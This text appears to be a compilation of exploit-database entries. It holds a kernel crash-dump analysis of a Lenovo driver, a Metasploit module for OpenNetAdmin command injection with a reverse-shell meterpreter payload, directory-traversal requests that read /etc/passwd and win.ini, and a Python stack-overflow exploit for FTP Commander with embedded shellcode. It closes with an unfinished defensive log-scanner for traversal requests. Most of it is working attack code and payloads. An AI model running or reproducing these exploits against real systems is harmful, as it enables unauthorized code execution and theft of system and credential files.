     BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
     DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
     PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS
     FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000
     TARGET_TIME: 2019-09-30T19:27:36.000Z
     OSBUILD: 17763
     OSSERVICEPACK: 0
     SERVICEPACK_NUMBER: 0
     OS_REVISION: 0
     SUITE_MASK: 272
     PRODUCT_TYPE: 1
     OSPLATFORM_TYPE: x64
     OSNAME: Windows 10
     OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS
     OS_LOCALE:
     USER_LCID: 0
     OSBUILD_TIMESTAMP: 1994-09-30 01:21:45
     BUILDDATESTAMP_STR: 180914-1434
     BUILDLAB_STR: rs5_release
     BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434
     ANALYSIS_SESSION_ELAPSED_TIME: ae
     ANALYSIS_SOURCE: KM
     FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000
     FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}

     Followup: MachineOwner
     ---------

     2: kd> u fffff804`28bf109d
     pmdrvs+0x109d:
     fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi]
     fffff804`28bf109f 41894308        mov     dword ptr [r11+8],eax
     fffff804`28bf10a3 e858ffffff      call    pmdrvs+0x1000 (fffff804`28bf1000)
     fffff804`28bf10a8 85c0            test    eax,eax
     fffff804`28bf10aa 0f8582000000    jne     pmdrvs+0x1132 (fffff804`28bf1132)
     fffff804`28bf10b0 488b8c2498000000 mov     rcx,qword ptr [rsp+98h]
     fffff804`28bf10b8 4885c9          test    rcx,rcx
     fffff804`28bf10bb 7475            je      pmdrvs+0x1132 (fffff804`28bf1132)

     2: kd> !for_each_frame .frame /r @$Frame
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
     00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
     rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
     rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
     rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10
      r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
     r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
     r14=0000000000000000 r15=ffffc709dee8f408
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!KeBugCheckEx:
     fffff804`1f269040 48894c2408      mov     qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
     01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
     rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
     rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
     rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10
      r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
     r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
     r14=0000000000000000 r15=ffffc709dee8f408
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!setjmpex+0x7f09:
     fffff804`1f27a8e9 90              nop
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
     02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
     rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
     rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
     rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10
      r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
     r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
     r14=0000000000000000 r15=ffffc709dee8f408
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!setjmpex+0x735c:
     fffff804`1f279d3c b801000000      mov     eax,1
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
     03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
     rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
     rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
     rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10
      r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
     r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
     r14=0000000000000000 r15=ffffc709dee8f408
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!_chkstk+0x41f:
     fffff804`1f271b4f 0f1f00          nop     dword ptr [rax]
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
     04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
     rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
     rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
     rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10
      r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
     r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
     r14=0000000000000000 r15=ffffc709dee8f408
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!RtlUnwindEx+0x3440:
     fffff804`1f1ca460 8bd0            mov     edx,eax
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
     05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
     rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b
     rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000
     rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150
      r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
     r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40
     r14=ffffc709dee8f4b0 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!ExReleaseAutoExpandPushLockExclusive+0x264:
     fffff804`1f0d7c24 84c0            test    al,al
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
     06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
     rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
     rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
     rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530
      r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
     r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
     r14=0000000000000002 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!setjmpex+0x7fe2:
     fffff804`1f27a9c2 488d8c2400010000 lea     rcx,[rsp+100h]
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
     07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
     rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
     rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
     rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530
      r8=fffff80428bf109d  r9=ffffc709dee8ec50 r10=0000000000000000
     r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
     r14=0000000000000002 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!setjmpex+0x42ce:
     fffff804`1f276cae 440f20c0        mov     rax,cr8
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
     08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
     rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
     rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
     rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
      r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
     r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
     r14=0000000000000002 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     pmdrvs+0x109d:
     fffff804`28bf109d 8b07            mov     eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
     09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
     rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
     rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000
     rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290
      r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
     r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
     r14=0000000000000002 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     pmdrvs+0x5060:
     fffff804`28bf5060 eb28            jmp     pmdrvs+0x508a (fffff804`28bf508a)
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
     0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
     rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
     rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
     rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290
      r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
     r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
     r14=0000000000000002 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!IofCallDriver+0x59:
     fffff804`1f12dba9 4883c438        add     rsp,38h
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
     0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
     rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
     rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
     rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290
      r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
     r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
     r14=0000000000000002 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!NtQueryInformationFile+0x1071:
     fffff804`1f6abb11 448bf0          mov     r14d,eax
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
     0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
     rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8
     rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0
     rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80
      r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
     r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc
     r14=0000000000000000 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!NtClose+0xffc:
     fffff804`1f6d763c eb25            jmp     nt!NtClose+0x1023 (fffff804`1f6d7663)
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
     0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
     rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
     rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
     rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80
      r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
     r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
     r14=0000000000000000 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!NtDeviceIoControlFile+0x56:
     fffff804`1f64c356 4883c468        add     rsp,68h
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
     0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
     rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
     rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
     rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80
      r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
     r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
     r14=0000000000000000 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     nt!setjmpex+0x7925:
     fffff804`1f27a305 0f1f00          nop     dword ptr [rax]
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
     0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
     rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8
     rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c
     rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c
      r8=000000000000000e  r9=ffffca04c1ca8d40 r10=fffff80428bf5020
     r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
     r14=0000000000000000 r15=0000000000000000
     iopl=0         nv up ei ng nz na pe nc
     cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
     00007fff`33aaf844 ??              ???
     _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
     00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx

     # Mitigation
     Update to Lenovo Power Management driver version 1.67.17.48 or higher
  8. class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenNetAdmin Ping Command Injection',
      'Description'    => %q{
        This module exploits a command injection in OpenNetAdmin
        between 8.5.14 and 18.1.1.
      },
      'Author'         =>
        [
          'mattpascoe',                   # Vulnerability discovery
          'Onur ER <[email protected]>'  # Metasploit module
        ],
      'References'     =>
        [
          ['EDB', '47691']
        ],
      'DisclosureDate' => '2019-11-19',
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Privileged'     => false,
      'Targets'        =>
        [
          ['Automatic Target', {}]
        ],
      'DefaultOptions' =>
        {
          'RPORT'   => 80,
          'payload' => 'linux/x86/meterpreter/reverse_tcp'
        },
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('VHOST', [false, 'HTTP server virtual host']),
        OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method'        => 'POST',
      'uri'           => normalize_uri(target_uri.path),
      'ctype'         => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'vars_post'     => {
        'xajax'       => 'window_open',
        'xajaxargs[]' => 'app_about'
      }
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.body =~ /OpenNetAdmin/i
      return CheckCode::Safe
    end

    opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first

    # No version string in the banner: report Detected instead of
    # feeding nil into Gem::Version
    return CheckCode::Detected unless opennetadmin_version

    # Pass the scanned version string itself, not the literal
    # 'opennetadmin_version' (which Gem::Version rejects as malformed)
    version = Gem::Version.new(opennetadmin_version)
    vprint_status "OpenNetAdmin version #{version}"

    if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
      return CheckCode::Appears
    end

    CheckCode::Detected
  end

  def exploit
    print_status('Exploiting...')
    execute_cmdstager(flavor: :printf)
  end

  def filter_bad_chars(cmd)
    # Non-bang gsub: gsub! returns nil when nothing matches, which would
    # interpolate an empty command into post_data below
    cmd.gsub(/chmod \+x/, 'chmod 777')
  end

  def execute_command(cmd, opts = {})
    post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping"

    begin
      send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path),
        'ctype'         => 'application/x-www-form-urlencoded',
        'encode_params' => false,
        'data'          => post_data
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end
  9. # Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
# Date: 2019-12-11
# Author: Numan Türle
# Vendor Homepage: http://www.bullwark.net/
# Version : Bullwark Momentum Series Web Server JAWS/1.0
# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24

POC
---------

GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

root:ABgia2Z.lfFhA:0:0::/root:/bin/sh
  10. # Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow
# Date: 2019-12-12
# Exploit Author: boku
# Discovered by: UN_NON
# Original DoS: FTP Commander 8.02 - Overwrite (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/37810
# Software Vendor: http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe
# Version: Version 8.03 & Version 8.02 (same exploit for both)
# Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418)
#            Windows 10 Education 1909 (32-bit; OS-build=18363.418)
#            Windows 10 Pro 1909 (32-bit; OS-build=18363.418)
#            Windows Vista Home Basic SP1 (6.0.6001 Build 6001)
#            Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Python Version: Python 2.7.16+

# Recreate:
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open ftpCommander v8.03 (or v8.02)
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
#    - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
#    - The program will crash & calculator will open

# Other Security Issue:
# - The program's default install path is: C:\\cftp\cftp.exe

#!/usr/bin/python

blt = '\033[92m[\033[0m+\033[92m]\033[0m '   # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '   # bash red error bullet

# Defined outside the try block so the except branch can always name the file
File = 'poc.txt'

try:
    # EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH
    nops = 'CGS[BOKU]J'*100   # 1000 nops that are ASCII friendly
    # EIP jump lands at the beginning of the buffer
    # Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode
    # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
    # x86/alpha_upper succeeded with size 447 (iteration=0)
    shellcode =  b""
    shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
    shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
    shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
    shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
    shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
    shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
    shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
    shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
    shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
    shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
    shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
    shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
    shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
    shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
    shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
    shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
    shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
    shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
    shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
    shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
    shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
    shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
    shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
    shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
    shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
    shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
    shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
    shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
    shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
    shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
    shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
    shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
    shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
    shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
    shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
    shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
    shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
    shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
    shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
    shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
    shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"

    # Fill the rest of the space with B's until we are at our EIP offset
    offset = '\x42'*(4108-len(nops+shellcode))

    # The EAX register holds a Pointer to the beginning of our buffer
    # FF20 = jmp [eax]
    # !mona find -o -s '\xFF\x20'
    # 0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe]
    # | ASLR: False; Rebase: False; SafeSEH: False;
    eip = '\x1a\x08\x41'   # 3 byte overwrite so we can set EIP to start with 0x00

    # After jmp [eax], we land at the beginning of our buffer
    payload = nops+shellcode+offset+eip

    f = open(File, 'w')   # open file for write
    f.write(payload)
    f.close()             # close the file
    print blt + File + " created successfully "
except:
    print err + File + ' failed to create'
  11. # Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
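The two directory-traversal posts above (9 and 11) each show a single raw `GET /../../..` request and the file it returned. What a defender needs from them is the detection side: a log check that recognizes such requests, including percent-encoded and double-encoded variants that the plain PoCs do not use, and that singles out the ones the server actually answered with a 2xx. The following Python scanner is an added example, not code from either post or from Bullwark or TVT; the access-log lines are constructed here (the two requests from 10.0.0.7 mirror the request lines quoted in the posts, the rest are made up), and the Common Log Format parsing is an assumption about the log source.

```python
import re
from urllib.parse import unquote

# Constructed access-log sample (Common Log Format). The two requests from
# 10.0.0.7 reproduce the request lines quoted in posts 9 and 11; the others
# are made up to show encoded variants and benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Dec/2019:10:00:01 +0300] "GET /index.html HTTP/1.1" 200 1234
10.0.0.7 - - [12/Dec/2019:10:00:02 +0300] "GET /../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 42
10.0.0.7 - - [12/Dec/2019:10:00:03 +0300] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92
10.0.0.9 - - [12/Dec/2019:10:00:04 +0300] "GET /img/..%2F..%2Fweb.config HTTP/1.1" 404 0
10.0.0.9 - - [12/Dec/2019:10:00:05 +0300] "GET /docs/%252e%252e/%252e%252e/etc/shadow HTTP/1.1" 403 0
10.0.0.3 - - [12/Dec/2019:10:00:06 +0300] "GET /static/app.js?v=1.2.3 HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"\s+(?P<status>\d{3})')


def normalize_path(target: str, max_rounds: int = 3) -> str:
    """Drop the query string, percent-decode until the value is stable
    (catches double encoding such as %252e), and treat backslashes as
    separators the way a Windows-hosted server would."""
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def escapes_root(path: str) -> bool:
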